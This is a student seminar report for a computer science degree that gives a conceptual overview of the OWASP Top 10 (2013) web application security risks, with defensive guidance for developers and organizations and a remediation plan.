A

SEMINAR REPORT

ON

“OWASP Top - 10”

Submitted for partial fulfillment award of

BACHELOR OF TECHNOLOGY

Degree In

Computer Science and Engineering

By

SHIVAM PORWAL

(131234040048)

UNDER the Supervision of

Er. SADIK KHAN

Department of Computer Science and Engineering,

Institute of Engineering and Technology,

BUNDELKHAND UNIVERSITY JHANSI

1

CERTIFICATE

TO WHOM IT MAY CONCERN

This is to certify that Mr. SHIVAM PORWAL (131234040048) student of B. TECH

(Computer Science and Engineering) final year (7th semester) has given a seminar on

“OWASP Top - 10”

SEMINAR INCHARGE

Date: Er. SADIK KHAN

Lecturer of Computer Science & Engg. Dept.,

I.E.T. B.U. Jhansi,

2

Acknowledgement

Whenever a module of work is completed successfully, a source of inspiration and guidance is

always there for students. I hereby take the opportunity to thanks all those persons to helped me

in developing this seminar.

I would like to express my gratitude to Er. Sadik khan, the seminar incharge for the guidance

and help I received from him.

I would also like to thanks Er. B.B Niranjan (Co-Ordinator of CSE), Er. B.P. Gupta, Er. Vijay

Kumar Verma, Dr. Lalit Kumar Gupta, Er. Anurag Kumar, Er. Akshay Saxena, Er.

Hemant Rai and all other faculty members I.E.T. Computer Engineering Dept. For their timely

and precious help.

SHIVAM PORWAL

3

TABLE OF CONTENTS

Sr No.

Topics

Page No.

1. What is OWASP 4

2. Introduction to OWASP TOP – 10 5

3. OWASP Top – 10 List 6

4. Top – 10 Vulnerabilities 7

5. Successful Attack & Risk Path

10

6. Risk Rating of OWASP Top – 10

11

7. What’s next for Developers?

12

8. What’s next for Verifiers and

Organizations?

13

9. Conclusion

14

10. References 15

4

1. What is OWASP?

The OWASP Foundation came online on December 1st 2001 it was established as a not-for-profit charitable organization in the United States on April 21, 2004 to ensure the ongoing availability and support for our work at OWASP. OWASP is an international organization and the OWASP Foundation supports OWASP efforts around the world. OWASP is an open community dedicated to enabling organizations to conceive, develop, acquire, operate, and maintain applications that can be trusted. All of the OWASP tools, documents, forums, and chapters are free and open to anyone interested in improving application security. OWASP advocate approaching application security as a people, process, and technology problem because the most effective approaches to application security include improvements in all of these areas. OWASP can be found at www.owasp.org.

OWASP is a new kind of organization. Their freedom from commercial pressures allows us to provide unbiased, practical, cost-effective information about application security. OWASP is not affiliated with any technology company, although owasp support the informed use of commercial security technology. Similar to many open-source software projects, OWASP produces many types of materials in a collaborative and open way. The OWASP Foundation is a not-for-profit entity that ensures the project's long-term success.

Principles

Free & Open

Governed by rough consensus & running code

Abide by a code of ethics (see ethics)

Not-for-profit

Not driven by commercial interests

Risk based approach

5

2. Introduction to OWASP Top - 10

Every few years, OWASP releases the OWASP Top 10, a list of the Top 10 most critical

application security risks faced by developers and organizations, with a goal of helping

developers and security teams better secure the applications they design and deploy. Because

the risks to applications are always evolving, The OWASP Top 10 list is revised each time to

reflect these changes, along with the techniques and best practices for avoiding and

remediating the vulnerabilities. In addition to the OWASP Top 10 for web applications, OWASP

has also created similar lists for Internet of Things vulnerabilities, as well as mobile security

issues. The list is compiled by evaluating the overall threat as well as the regularity of the

threats faced. Some risks may be rare but when exploited could be fatal, while others are

common but easy to guard against.

Latest release and accepted worldwide – OWASP TOP – 2013

Under construction (possible in DEC-2016) – OWASP TOP – 2016

How it works

The OWASP Top 10 for 2013 is based on 8 datasets from 7 firms that specialize in application security, including 4 consulting companies and 3 tool/SaaS vendors (1 static, 1 dynamic, and 1 with both). This data spans over 500,000 vulnerabilities across hundreds of organizations and thousands of applications. The Top 10 items are selected and prioritized according to this prevalence data, in combination with consensus estimates of exploitability, detectability, and impact estimates.

Aim:

The primary aim of the OWASP Top 10 is to educate developers, designers, architects, managers, and organizations about the consequences of the most important web application security weaknesses. The Top 10 provides basic techniques to protect against these high risk problem areas – and also provides guidance on where to go from here.

6

3. OWASP Top – 10 List

FIGURE 1: OWASP TOP 10 – 2013 Vulnerabilities

FIGURE 2: Comparison between OWASP TOP 10 – 2013 and OWASP TOP 10 – 2010 Vulnerabilities

7

4. Top – 10 Vulnerabilities

I. Injection

Injections are at the head of the OWASP Top 10, and occur when a database or other areas of

the web app where inputs aren’t properly sanitized, allowing malicious or untrusted data into

the system to cause harm. SQL injection attacks are simply when data is sent to any form of

code interpreter that can be run as a command or in the case of a database – a query. The

idea is that the data fools the interpreter into either handing over data that the attacker

wants or it executes commands that may be hostile in the environment.

FIGURE 3: Injection Vulnerability

II. Broken Authentication & Session Management

Broken Authentication and Session Management vulnerabilities allow anonymous attacks aimed at attempting to steal valuable data, especially Personally Identifiable Information. If authentication or session management protocols have not been implemented properly, they may enable a hostile to steal passwords, session keys or tokens or otherwise assume or exploit a_user’s_identity.

FIGURE 4: Use Of Unknown Session ID

8

III. Cross-Site Scripting XSS

Cross-Site Scripting, often shortened as XSS, attempts to trick a browser into accepting data that isn’t from a trusted source. Applications that allow user input but don’t have control over output are highly vulnerable to XSS. If successful, XSS allows the attacker to take over a user session, cause damage to a website or force the user to visit another site (often a website hosting further hostile code). There are three different kinds of XSS attacks, referred to as Stored XSS, DOM Based XSS, and Reflected XSS.

FIGURE 5: Cross Site Scripting Vulnerability

IV. Insecure Direct Object References

Insecure Direct Object References occur when authentication isn’t properly executed. If an application is vulnerable, malicious users may be able to gain administrative access to the application. If no access control check or other protection is in place, an attacker could manipulate that type of reference to access data they’re not authorized for.

V. Security Misconfiguration

When security processes and practices aren’t correctly followed, or implemented, Security Misconfigurations can easily be used by attackers to detect weak areas that would allow them to access privileged data. Configuration of the whole application environment including servers, platforms, etc. needs to be properly defined, implemented and controlled or it can lead to security holes.

VI. Sensitive Data Exposure

When security controls like SSL and HTTPS are not properly implemented, data can be leaked or stolen through a Sensitive Data Exposure vulnerability. Sensitive data such as Personally Identifiable Information, including financial and banking details, tax IDs, and passwords can be at risk if not correctly secured. Applications should ensure that they authenticate access,

9

encrypt data and ensure the integrity of data in the transport layer. A failure to do so may allow for weak (and exploitable) algorithms and might allow access from expired or forged certificates, leading to a privacy violation.

VII. Missing Function Level Access Control

Most web applications verify function level access rights before making that functionality visible in the UI. However, applications need to perform the same access control checks on the server when each function is accessed. If requests are not verified, attackers will be able to forge requests in order to access functionality without proper authorization.

VIII. Cross-Site Request Forgery (CSRF)

Cross-Site Request Forgery attacks, often shortened to CSRF, allow the attacker to forge an HTTP request from the victim, and may include data such as cookies or authentication information. The victim’s browser may then be used to generate additional requests that appear legitimate to the object of the attack.

IX. Using Components with Known Vulnerabilities Components, such as libraries, frameworks, and other software modules, almost always run with full privileges. If a vulnerable component is exploited, such an attack can facilitate serious data loss or server takeover. Applications using components with known vulnerabilities may undermine application defenses and enable a range of possible attacks and impacts.

X. Unvalidated Redirects and Forwards

Web applications frequently redirect and forward users to other pages and websites, and use untrusted data to determine the destination pages. Without proper validation, attackers can redirect victims to phishing or malware sites, or use forwards to access unauthorized pages.

FIGURE 6: A User Redirected To a Malware Website

10

5. Successful Attack & Risk Path

FIGURE 7: A Successful Attack process

Figure 6 illustrates a successful attack in flowchart form: The Threat Agents (hackers) launch a series of attack vectors (i.e., methods by which access to the system is gained). The attack vectors can be web pages, viruses, e-mail attachments, or instant messages, etc. One of the attack vectors is able to find a Security Weakness (e.g., weak authentication, lack of encryption, lack of data validation, etc). There is a failure in one of the Security Controls (Physical, Procedural, Technical/ Legal, or Regulatory) that would otherwise stop the attack. The attack has a Technical Impact, such as a loss of any one of the following: Confidentiality, Integrity, Availability, or Accountability. Finally, the attack has a Business Impact, such as Financial Damage, Non-Compliance, Privacy Violation, or Damage to the Organization’s Reputation.

11

6. Risk Rating of OWASP Top – 10

OWASP risk ratings are shown in the table in this slide. Risks are rated according to Exploitability, Prevalence, Detectability, and Impact. Risks are listed in the order of seriousness, from the top to the bottom of the chart.

FIGURE 8: OWASP TOP-10 Risk Rating Table

By putting flaws into the Top 10 format, an organization can calculate risk factors and provide a framework to reduce overall risk exposure. The OWASP Top 10 is comprehensive, but there are other important application security risks that are constantly being discovered. A limitless number of vulnerabilities have yet to be identified.

12

7. What’s next for Developers?

“SECURE CODING” No application is completely secure, but adhering to the following principals will minimize risk: • Minimize the attack surface area (plug the holes and minimize the access points). • Establish and implement secure default settings with password expiration and timeouts, etc. • Implement the principle of “Least Privilege”; don’t give users access to things that they don’t need to do their jobs. • Implement “Defence in Depth” with re-authentication, tokens, and hidden IDs, etc. • Applications should fail securely. • Don’t trust services or 3rd parties. • Implement “Separation of Duties” (e.g., an admin is not an auditor – and vice versa). • Avoid security by obscurity (“hiding” is only a temporary fix). • Keep security simple (humans will always bypass)

13

8. What’s next for Verifiers and Organizations?

To Verify the security of a web application you have developed, or one you are considering

purchasing, OWASP recommends that you review the application’s code (if available), and test the application as well. OWASP recommends a combination of secure code review and application penetration testing whenever possible, as that allows you to leverage the strengths of both techniques, and the two approaches complement each other. Tools for assisting the verification process can improve the efficiency and effectiveness of an expert analyst. OWASP’s assessment tools are focused on helping an expert become more effective, rather than trying to automate the analysis process itself.

Organizations must establish an effective capability for securing their applications. Given

the staggering number of applications and lines of code already in production, many organizations are struggling to get a handle on the enormous volume of vulnerabilities. OWASP recommends that organizations establish an application security program to gain insight and improve security across their application portfolio. Achieving application security requires many different parts of an organization to work together efficiently, including security and audit, software development, and business and executive management.

FIGURE 9: Vulnerability Scanners

Above are the lists some of the more popular vulnerability scanners on the market. Vulnerability scanners are available as commercial tools, as freeware and open source tools, and as software-as-a-service tools.

14

9. Conclusion The Top 10 cover a lot of ground, but there are many other risks you should consider and evaluate in your organization. Some of these have appeared in previous versions of the Top 10, and others have not, including new attack techniques that are being identified all the time. The primary aim of the OWASP Top 10 is to educate developers, designers, architects, managers, and organizations about the consequences of the most important web application security weaknesses. The Top 10 provides basic techniques to protect against these high risk problem areas – and also provides guidance on where to go from here. CREATE A REMEDIATION PLAN 1. Identify assets and risks, which consists of the following: • Obtain a full understanding of what you own (tangible and intangible). • Obtain a full understanding of the risks associated with those assets. 2. Conduct a gap analysis and prioritize risks: • Determine the biggest risks to your most expensive assets. • Prioritize the risks. • Draft and communicate those risks in order (i.e. high/medium/low) to the organization. 3. Planning and Execution: • Begin planning your remediation plan (i.e. bud get, technology, team, timeframe). • Publish the plan and execute the plan. 4. Track, monitor, and improve the plan. This step will be time-consuming. (The amount of time that it takes depends on the GAP analysis.) This is an ongoing process; the program is never finished; it restarts and can always be improved. It is important to manage costs, time, and resources for solid execution.

15

10. References

A. Whitepaper on Web Application Security and the OWASP Top 10 By Jon Panella under the guidance of Sapient Nitro.

B. Open Web Application Security Project Report on OWASP Top -10.

C. OWASP Top -10 by developersWorks IBM.